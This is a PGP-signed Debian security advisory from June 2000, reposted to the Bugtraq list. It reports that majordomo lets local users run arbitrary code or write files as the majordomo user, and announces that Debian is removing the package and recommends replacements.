Reply-To: Aleph One <aleph1@UNDERGROUND.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
- ------------------------------------------------------------------------
Debian Security Advisory security@debian.org
http://www.debian.org/security/ Wichert Akkerman
June 3, 2000
- ------------------------------------------------------------------------
Package : majordomo
Problem type : local exploit
Debian-specific: no
The majordomo package as shipped in the non-free section accompanying
Debian GNU/Linux 2.1/slink allows any local user to trick majordomo
into executing arbitrary code or to create or write files as the
majordomo user anywhere on the filesystem.
This is a documented issue and the advised work around it to either
have no untrusted users on a system running majordomo or to use a
setuid wrapper that the MTA delivery agent can run. suboptimal
solution.
We feel that those options are not a good solution, but unfortunately
the majordomo license does not allow us to fix these problems and
distribute a fixed version. As a result we have decided to remove
majordomo from our archives.
If you are using majordomo we recommend that you replace it with one
of the many other mailing-list tools available such as fml, mailman
or smartlist.
- --
- ----------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable updates
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQB1AwUBOTlZ/6jZR/ntlUftAQFQ6QL/XyB4EprpjY4D2eusMd9PR+UKKh0jI7Zi
IMWf0Avik9wN6HWba64kODvePxKChnh7z2jvG3hz8CIZr6siYsTuFWtu2UkVhdZj
THnYqB87Sqp7XIdO46R7qjnLU0KibPqQ
=w/uo
-----END PGP SIGNATURE-----
(5158336) ------------------------------------------(Ombruten)